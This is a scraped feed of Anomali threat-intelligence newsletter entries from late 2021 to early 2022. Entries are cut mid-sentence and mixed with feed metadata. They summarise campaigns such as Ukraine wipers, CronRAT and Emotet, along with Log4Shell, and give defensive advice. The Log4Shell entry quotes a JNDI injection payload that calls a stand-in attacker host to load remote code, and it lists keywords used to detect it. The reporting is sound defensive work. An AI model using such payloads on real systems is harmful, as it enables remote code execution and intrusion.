Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot (published: February 25, 2022) Researchers at Unit 42 identified an attack targeting an energy organization in Ukraine. Ukrainian CERT has attributed this attack to a threat group they track as UAC-0056. The targeted attack involved a spear phishing email sent to organization employees containing a malicious JavaScript file that would download and install a downloader known as SaintBot and a document stealer called OutSteel. Actors leverage Discord’s content delivery network (CDN) to host their payload. Goal of this attack was data collection on government organizations and companies involved with critical infrastructure. Analyst Comment: Administrators can block traffic to discordapp[.]com if their organization doesn’t have a current legitimate use of Discord. Implement attack surface reduction rules for Microsoft Office. Train users to recognize, safely process, and report potential spearphishing emails. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Modify Registry - T1112 Tags: Russia, Ukraine, OutSteal, SaintBot, UAC-0056, TA471, Lorec53, SaintBear, Ukraine-Russia Conflict 2022, Operation Bleeding Bear Disruptive HermeticWiper Attacks Targeting Ukrainian Organizations (published: February 25, 2022) Researchers at Secureworks have identified and investigated reports of Ukrainian government and financial organizations being impacted by distributed denial of service and wiper attacks. Between 15-23 Feb intermittent loss of access to a large number of government websites belonging to the Ukrainian Ministry of Foreign Affairs, Ministry of Defense, Security Service, Ministry of Internal Affairs, and Cabinet of Ministers. PrivatBank and Oschadbank. Along with this, the threat actors also targeted some government and financial organizations in Ukraine to deploy a novel wiper dubbed ‘HermeticWiper’ which abuses a legitimate & signed EaseUS partition management driver. In other attacks targeting Ukraine researchers also observed 13 Ukrainian government websites defaced and Tor forums listing data for Ukrainian citizens being available for sale. Analyst Comment: Organizations exposed to war between Russia and Ukraine should be on high alert regarding the ongoing cyberattacks. Implement defense-in-depth approach including patch management, anti-phishing training, disaster recovery plans, and backing up your information and systems. MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | ]]> 2022-03-01T16:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-information-stealing-and-wiping-campaigns-target-ukraine-electron-bot-is-after-social-media-accounts-attackers-poison-application-and-library-repositories-and-more www.secnews.physaphae.fr/article.php?IdArticle=4208291 False Ransomware,Malware,Tool,Vulnerability,Threat None 4.0000000000000000 Anomali - Firm Blog interactive tour to learn more.  Announcing the Anomali Platform  As I mentioned above, moving Match to the cloud created synergistic threat detection and response capabilities in a cloud-native environment across the entire Anomali portfolio. With that, we’re able to offer fully cloud-native multi-tenant solutions that easily integrate into existing security tech stacks.  We’re excited to introduce The Anomali Platform, a cloud-native extended detection and response (XDR) solution. The Anomali Platform is made up of critical components that work together to ingest security data from any telemetry source and correlate it with our global repository of threat intelligence to drive detection, prioritization, analysis, and response.  Included in the Anomali Platform are: Anomali Match  Anomali ThreatStream  Anomali Lens  By combining big data management, machine learning, and the world’s largest global threat intelligence repository, organizations can understand what’s happening inside and outside their network within seconds. Read the Enterprise Management Associates (EMA) Impact Brief to see what they had to say about The Anomali Platform or take our interactive tour to learn more. And keep an eye out for our live event coming in Mid-April. Increased Insights with]]> 2022-03-01T12:00:00+00:00 https://www.anomali.com/blog/anomali-february-quarterly-product-release www.secnews.physaphae.fr/article.php?IdArticle=4206700 False Tool,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence EvilPlayout: Attack Against Iran’s State Broadcaster (published: February 18, 2022) Checkpoint Researchers have released an article detailing their findings regarding a wave of cyber attacks directed at Iranian broadcast infrastructure during late January 2022. IRIB, an Iranian state broadcaster, was compromised, with malicious executables and wipers being responsible for the attack. Said malware had multiple functions, including hijacking of several tv stations to play recordings of political opposition leaders demanding the assassination of Iran’s supreme leader. Additional functionality includes custom backdoors, screenshot capability and several bash scripts to download other malicious executables. The malware appears new, with no previous appearances, nor has there been any actor attribution as of the date of publication. Analyst Comment: Utilize all telemetry and feed it into a SIEM to help identify malicious activity within your network. Anomali Match can collide this telemetry against global intelligence to assist in identifying malicious indicators within your network. A defense in depth approach will also mitigate the damage any compromises can do to your infrastructure. MITRE ATT&CK: [MITRE ATT&CK] Screen Capture - T1113 Tags: Iran, IRIB, Ava, Telewebion Microsoft Teams Targeted With Takeover Trojans (published: February 17, 2022) Researchers at Avanan have documented a new phishing technique that threat actors are using that abuses the trust users of Microsoft Teams have for the platform to deliver malware. Threat Actors send phishing links to victims which initiate a chat on the platform, after which they will post a link to a dll file within the chat box. When clicked, it will install a trojan of choice on the target machine. With over 279 million users, this presents a new attack vector for threat actors to abuse. Analyst Comment: Never click on a link or open attachments from untrusted senders when receiving email. Be skeptical of strangers attempting to move conversation to another platform, even if you use that platform. Be wary of links posted in apps that are used for communication, as links that are posted on trusted platforms are not trustworthy themselves. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Trusted Relationship - T1199 Tags: Microsoft Teams, trojan, phishing Red Cross: State Hackers Breached our Network Using Zoho bug (published: February 16, 2022) The International Committee of the Red Cross (ICRC) suffered a data breach during January 2022. The incident led to the exfiltration of over 515,000 individual's PII, linked to their Restoring Family Links pro]]> 2022-02-23T18:46:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-evilplayout-attack-against-irans-state-broadcaster-microsoft-teams-targeted-with-takeover-trojans-ice-phishing-on-the-blockchain-and-more www.secnews.physaphae.fr/article.php?IdArticle=4173238 False Ransomware,Data Breach,Malware,Tool,Vulnerability,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence What’s With The Shared VBA Code Between Transparent Tribe And Other Threat Actors? (published: February 9, 2022) A recent discovery has been made that links malicious VBA macro code between multiple groups, namely: Transparent Tribe, Donot Team, SideCopy, Operation Hangover, and SideWinder. These groups operate (or operated) out of South Asia and use a variety of techniques with phishing emails and maldocs to target government and military entities within India and Pakistan. The code is similar enough that it suggests cooperation between APT groups, despite having completely different goals/targets. Analyst Comment: This research shows that APT groups are sharing TTPs to assist each other, regardless of motive or target. Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel. MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Phishing - T1566 Tags: Transparent Tribe, Donot, SideWinder, Asia, Military, Government Fake Windows 11 Upgrade Installers Infect You With RedLine Malware (published: February 9, 2022) Due to the recent announcement of Windows 11 upgrade availability, an unknown threat actor has registered a domain to trick users into downloading an installer that contains RedLine malware. The site, "windows-upgraded[.]com", is a direct copy of a legitimate Microsoft upgrade portal. Clicking the 'Upgrade Now' button downloads a 734MB ZIP file which contains an excess of dead code; more than likely this is to increase the filesize for bypassing any antivirus scan. RedLine is a well-known infostealer, capable of taking screenshots, using C2 communications, keylogging and more. Analyst Comment: Any official Windows update or installation files will be downloaded through the operating system directly. If offline updates are necessary, only go through Microsoft sites and subdomains. Never update Windows from a third-party site due to this type of attack. MITRE ATT&CK: [MITRE ATT&CK] Video Capture - T1125 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: RedLine, Windows 11, Infostealer ]]> 2022-02-15T20:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-mobile-malware-is-on-the-rise-apt-groups-are-working-together-ransomware-for-the-individual-and-more www.secnews.physaphae.fr/article.php?IdArticle=4134740 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline APT 43,Uber,APT 36,APT-C-17 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence FBI Warns Of Malicious QR Codes Used To Steal Your Money (published: January 23, 2022) The Federal Bureau of Investigation (FBI) recently released a notice that malicious QR codes have been found in the wild. These codes, when scanned, will redirect the victim to a site where they are prompted to enter personal and payment details. The site will then harvest these credentials for cybercriminals to commit fraud and empty bank accounts. This threat vector has been seen in Germany as of December 2021. Analyst Comment: Always be sure to check that emails have been sent from a legitimate source, and that any financial details or method of payment is done through the website. While QR codes are useful and being used by businesses more often, it is easy for cybercriminals to perform this kind of scam. If scanning a physical QR code, ensure the code has not been replaced with a sticker placed on top of the original code. Check the final URL to make sure it is the intended site and looks authentic. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 Tags: EU & UK, Banking and Finance MoonBounce: The Dark Side Of UEFI Firmware (published: January 20, 2022) Kaspersky has reported that in September 2021, a bootloader malware infection had been discovered that embeds itself into UEFI firmware. The malware patches existing UEFI drivers and resides in the SPI flash memory located on the motherboard. This means that it will persist even if the hard drive is replaced. Code snippets and IP addresses link the activity to APT41, a group that is operated by a group of Chinese-speaking individuals. MoonBounce is highly sophisticated and very difficult to detect. Analyst Comment: Systems should be configured to take advantage of Trusted Platform Module (TPM) hardware security chips to secure their systems' boot image and firmware, where available. Secure boot is also a viable option to mitigate against attacks that would patch, reconfigure, or flash existing UEFI firmware to implant malicious code. MITRE ATT&CK: [MITRE ATT&CK] Pre-OS Boot - T1542 | [MITRE ATT&CK] Data Obfuscation - T1001 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exploitation of Remote Services - T1210 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Hijack Execution Flow - T1574 | ]]> 2022-01-25T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-moonbounce-accesspress-qr-code-scams-and-more www.secnews.physaphae.fr/article.php?IdArticle=4030711 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline APT 28,APT 41 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques (published: January 17, 2022) The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2. Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow]]> 2022-01-19T22:45:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russia-sponsored-cyber-threats-china-based-earth-lusca-active-in-cyberespionage-and-cybertheft-bluenoroff-hunts-cryptocurrency-related-businesses-and-more www.secnews.physaphae.fr/article.php?IdArticle=3999162 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Guideline APT 38,APT 29,APT 28,APT 28,APT 41 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Attack Misuses Google Docs Comments to Spew Out “Massive Wave” of Malicious Links (published: January 7, 2022) Security researchers have seen a very large number of attacks leveraging the comment features of Google Docs to send emails to users containing malicious content. The attackers can create a document, sheet, or slides and add comments tagging any user's email address. Google then sends an email to the tagged user account. These emails come from Google itself and are more likely to be trusted than some other phishing avenues. Analyst Comment: Phishing education can often help users identify and prevent phishing attacks. Specific to this attack method, users should verify that any unsolicited comments that are received come from the user indicated, and if unsure, reach out separately to the user that appears to have sent the comment to verify that it is real. Links in email should be treated with caution. MITRE ATT&CK:[MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Phishing - T1156 Tags: Google, Impersonation, Phishing Finalsite Ransomware Attack Forces 5,000 School Websites Offline (published: January 7, 2022) Finalsite, a firm used by schools for website content management, design, and hosting, has been hit by an unknown strain of ransomware that affected approximately 5,000 of their 8,000 customers. The company has said in a statement that many of the affected sites were preemptively shut down to protect user's data, that there is no evidence of that data was breached (although they did not confirm that they had the needed telemetry in place to detect that), and that most of the sites and services have been restored. Analyst Comment: Verified backup and disaster recovery processes are an important aspect of protecting organizations and allowing for remediation of successful attacks. Monitoring and telemetry can aid in detection and prevention from attacks, and provide evidence as to whether data has been exfiltrated. MITRE ATT&CK:[MITRE ATT&CK] Web Service - T1102 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Education, Finalsite, Ransomware, Web hosting FluBot’s Authors Employ Creative and Sophisticated Techniques to Achieve Their Goals in Version 5.0 and Beyond (published: January 6, 2022) Security researchers have analyzed a new and more sophisticated version of the FluBot Android malware first detected in early 2020. Once installed on a device, the malware can full]]> 2022-01-12T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-flubot-ios-ransomware-zloader-and-more www.secnews.physaphae.fr/article.php?IdArticle=3952434 False Ransomware,Data Breach,Malware,Tool,Vulnerability,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Fintech Firm Hit by Log4j Hack Refuses to Pay $5 Million Ransom (published: December 29, 2021) The Vietnamese crypto trading, ONUS, was breached by unknown threat actor(s) by exploiting the Log4Shell (CVE-2021-44228) vulnerability between December 11 and 13. The exploited target was an AWS server running Cyclos, which is a point-of-sale software provider, and the server was only intended for sandbox purposes. Actors were then able to steal information via the misconfigured AWS S3 buckets containing information on approximately two million customers. Threat actors then attempted to extort five million dollars (USD). Analyst Comment: Although Cyclos issued a warning to patch on December 13, the threat actors had already gained illicit access. Even though Log4Shell provided initial access to the compromised server, it was the misconfigured buckets the actors took advantage of to steal data. MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 Tags: ONUS, Log4Shell, CVE-2021-44228, Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends (published: December 29, 2021) Palo Alto Networks Unit42 researchers have published a report based on their tracking of strategically-aged malicious domains (registered but not used until a specific time) and their domain generation algorithm (DGA) created subdomains. Researchers found two Pegasus spyware command and control domains that were registered in 2019 and were not active until July 2021. A phishing campaign using DGA subdomains that were similar to those used during the SolarWinds supply chain attack was also identified. Analyst Comment: Monitor your networks for abnormal DNS requests, and have bandwidth limitations in place, if possible, to prevent numerous connections to DGA domains. Knowing which DGAs are most active in the wild will allow you to build a proactive defense by detecting any DGA that is in use. Anomali can detect DGA algorithms used by malware to assist in defending against these types of threats. MITRE ATT&CK: [MITRE ATT&CK] Dynamic Resolution - T1568 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Application Layer Protocol - T1071 Tags: DGA , Pegasus, Phishing Implant.ARM.iLOBleed.a (published: December 28, 2021) Amnpardaz researchers discovered a new rootkit that has been targeting Hewlett-Packard Enterprise’s Integrated Lights-Out (iLO) server managemen]]> 2022-01-05T19:55:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-5-million-breach-extortion-apts-using-dga-subdomains-cyberespionage-group-incorporates-a-new-tool-and-more www.secnews.physaphae.fr/article.php?IdArticle=3928542 False Malware,Hack,Tool,Vulnerability,Threat LastPass None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence A Deep Dive into DoubleFeature, Equation Group’s Post-Exploitation Dashboard (published: December 27, 2021) Check Point researchers have published their findings on the Equation Group’s post-exploitation framework DanderSpritz — a major part of the “Lost in Translation” leak — with a focus on its DoubleFeature logging tool. DoubleFeature (similar to other Equation Group tools) employs several techniques to make forensic analysis difficult: function names are not passed explicitly, but instead a checksum of it; strings used in DoubleFeature are decrypted on-demand per function and they are re-encrypted once function execution completes. DoubleFeature also supports additional obfuscation methods, such as a simple substitution cipher and a stream cipher. In its information gathering DoubleFeature can monitor multiple additional plugins including: KillSuit (also known as KiSu and GrayFish) plugin that is running other plugins, providing a framework for persistence and evasion, MistyVeal (MV) implant verifying that the targeted system is indeed an authentic victim, StraitBizarre (SBZ) cross-platform implant, and UnitedRake remote access tool (UR, EquationDrug). Analyst Comment: It is important to study Equation Group’s frameworks because some of the leaked exploits were seen exploited by other threat actors. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 Tags: Equation Group, DanderSpritz, DoubleFeature, Shadow Brokers, EquationDrug, UnitedRake, DiveBar, KillSuit, GrayFish, StraitBizarre, MistyVeal, PeddleCheap, DiceDealer, FlewAvenue, DuneMessiah, CritterFrenzy, Elby loader, BroughtHotShot, USA, Russia, APT Dridex Affiliate Dresses Up as Scrooge (published: December 23, 2021) Days before Christmas, an unidentified Dridex affiliate is using malspam emails with extremely emotion-provoking lures. One malicious email purports that 80% of the company’s employees have tested positive for Omicron, a variant of COVID-19, another email claims that the recipient was just terminated from his or her job. The attached malicious Microsoft Excel documents have two anti-sandbox features: they are password protected, and the macro doesn’t run until a user interacts with a pop-up dialog. If the user makes the macro run, it will drop an .rtf f]]> 2021-12-29T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-equation-groups-post-exploitation-framework-decentralized-finance-defi-protocol-exploited-third-log4j-vulnerability-and-more www.secnews.physaphae.fr/article.php?IdArticle=3904146 False Ransomware,Malware,Tool,Vulnerability,Threat,Conference APT 35 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 29,APT 25,APT 37,APT 15,APT 15 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021) Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129 Tags: NginRAT, CronRAT, Nginx, North America, EU How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021) Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested. Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel. Tags: Phishing, XBATLI Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub]]> 2021-12-07T16:04:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-nginx-trojans-blackbyte-ransomware-android-malware-campaigns-and-more www.secnews.physaphae.fr/article.php?IdArticle=3757325 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud APT 37 4.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Micropatching Unpatched Local Privilege Escalation in Mobile Device Management Service (CVE-2021-24084 / 0day) (published: November 26, 2021) 0patch Team released free, unofficial patches to protect Windows 10 users from a local privilege escalation (LPE) zero-day vulnerability in the Mobile Device Management Service. The security flaw resides under the "Access work or school" settings, and it bypasses a patch released by Microsoft in February to address an information disclosure vulnerability tracked as CVE-2021-24084. Security researcher Abdelhamid Naceri discovered this month that the incompletely-patched flaw could also be exploited to gain admin privileges after publicly disclosing the newly-spotted bug in June. He also published a proof of concept (POC) for a related vulnerability in Windows 11. Analyst Comment: Check if your Windows 10 version is affected and if so, apply the appropriate free micropatches. Plan to patch your Windows 11 systems when security patches become available. As actors now have a POC for the Windows 11 privilege escalation vulnerability, it is important to harden your systems to avoid the initial access. MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 Tags: CVE-2021-24084, Vulnerability, Micropatching, Privilege escalation, LPE, Administrative access, Zero-day, Windows, Windows 10, Windows 11 CronRAT Malware Hides Behind February 31st (published: November 24, 2021) Sansec researchers have discovered CronRAT, a new remote access trojan (RAT), that is capable of stealing payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. By modifying the server-side code it bypasses browser-based security solutions. CronRAT actors engage in Magecart attacks achieving additional stealthiness thanks to the Linux Cron Job system. CronRAT code is compressed, Base64-encoded and hidden in the task names in the calendar subsystem of Linux servers (“cron”). To avoid system administrators’ attention and execution errors, those tasks are scheduled on a nonexistent day (such as February 31st). Other CronRAT stealthiness techniques are: anti-tampering checksums, being controlled via binary/obfuscated protocol, control server disguised as Dropbear SSH service, fileless execution, launching tandem RAT in a separate Linux subsystem, and timing modulation. Analyst Comment: Websites, much like personal workstations, require constant maintenance and upkeep in order to adapt to the latest threats. All external facing assets should be monitored and scanned for vulnerabilities. Threats like CronRAT make it critical that server software is kept up to date. The ability to easily restore from backup, incident response planning, and customer communication channels should all be established before a breach occurs. In addition, supply chain attacks are becoming more frequent amongst threat actors as their Tactics, Techniques, and Procedures (TTPs) evolve. Therefore, it is par]]> 2021-11-30T17:09:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-web-skimmers-victimize-holiday-shoppers-tardigrade-targets-vaccine-manufacturers-babadeda-crypter-targets-crypto-community-and-more www.secnews.physaphae.fr/article.php?IdArticle=3728811 False Ransomware,Malware,Tool,Vulnerability,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Emotet malware is back and rebuilding its botnet via TrickBot (published: November 15, 2021) After Europol enforcement executed a takeover of the Emotet infrastructure in April 2021 and German law enforcement used this infrastructure to load a module triggering an uninstall of existing Emotet installs, new Emotet installs have been detected via initial infections with TrickBot. These campaigns and infrastructure appear to be rapidly proliferating. Once infected with Emotet, in addition to leveraging the infected device to send malspam, additional malware can be downloaded and installed on the victim device for various purposes, including ransomware. Researchers currently have not seen any spamming activity or any known malicious documents dropping Emotet malware besides from TrickBot. It is possible that Emotet is using Trickbot to rebuild its infrastructure and steal email chains it will use in future spam attacks. Analyst Comment: Phishing continues to be a preferred method for initial infection by many actors and malware families. End users should be cautious with email attachments and links, and organizations should have robust endpoint protections that are regularly updated. ***For Anomali ThreatStream Customers*** To assist in helping the community, especially with the online shopping season upon us, Anomali Threat Research has made available two, threat actor-focused dashboards: Mummy Spider and Wizard Spider, for Anomali ThreatStream customers. The Dashboards are preconfigured to provide immediate access and visibility into all known Mummy Spider and Wizard Spider indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on ThreatStream. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Data Encrypted - T1022 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Automated Collection - T1119 Tags: Emotet, Trickbot, phishing, ransomware Wind Turbine Giant Offline After Cyber Incident (published: November 22, 2021) The internal IT systems for Vestas Wind Systems, the world's largest manufacturer of wind turbines, have been hit by an attack. This attack does not appear to have affected their manufacturing or supply chain, and recovery of affected systems is underway, although a number of systems remain off as a precaution. The company has announced that some data has been compromised. The investigation of this incident is ongoing, but may have been a ransomware attack. The incidents of ransomware across the globe increased by near]]> 2021-11-23T20:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt-emotet-iran-redcurl-and-more www.secnews.physaphae.fr/article.php?IdArticle=3699453 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Patching None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer (published: November 8, 2021) US Cybersecurity and Infrastructure Security Agency (CISA) has released an alert about advanced persistent threat (APT) actors exploiting vulnerability in self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus. PaloAlto, Microsoft & Lumen Technologies did a joint effort to track, analyse and mitigate this threat. The attack deployed a webshell and created a registry key for persistence. The actor leveraged leased infrastructure in the US to scan hundreds of organizations and compromised at least nine global organizations across technology, defense, healthcare and education industries. Analyst Comment: This actor has used some unique techniques in these attacks including: a blockchain based legitimate remote control application, and credential stealing tool which hooks specific functions from the LSASS process. It’s important to make sure your EDR solution is configured to and supports detecting such advanced techniques in order to detect such attacks. MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Credentials in Files - T1081 | [MITRE ATT&CK] Brute Force - T1110 | 